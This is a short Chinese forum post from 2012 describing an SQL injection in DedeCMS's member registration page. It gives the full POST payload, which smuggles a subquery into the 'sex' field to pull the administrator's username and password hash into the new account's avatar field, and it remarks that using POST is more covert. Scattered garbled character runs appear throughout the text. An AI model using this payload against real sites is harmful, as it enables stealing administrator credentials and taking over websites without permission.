dedecms版本 20121122
) F4 T% u/ V# Y8 O8 Q; q) N2 ]: _! _1 o8 G* D
需要magic_quotes_gpc=Off
3 G9 v- r9 r% B/ v
3 \; j6 d; Q4 Q" L& s应该是没有什么大危害的漏洞.! ~4 ?' ?% `5 f
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
# E: H) V) x) D% M+ |+ B& W4 ^( ] F+ Y' \) f5 F1 i+ s
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
( j1 p0 F) \: i$ uPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
/ O6 n" F! R( h- M% J' i" n {4 v7 D
http:///de/member/reg_new.php5 k3 C6 J+ {. ]) f: l& s
. `7 H0 n" G9 s7 O6 T- qPOST
9 e- j# `0 g( }" B+ c; c
5 B& S1 _: j# L9 O+ Tdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
2 Y. }2 q* B2 ]" K* u
$ G# l1 ]6 E- |* w& ~% R# f成功注册后,头像处里面有好玩的信息.0 h# _% b9 O- { n% A. O* [3 }
7 ^; G6 k8 k! z |
发表于 2012-12-5 10:03:32
收藏
支持
反对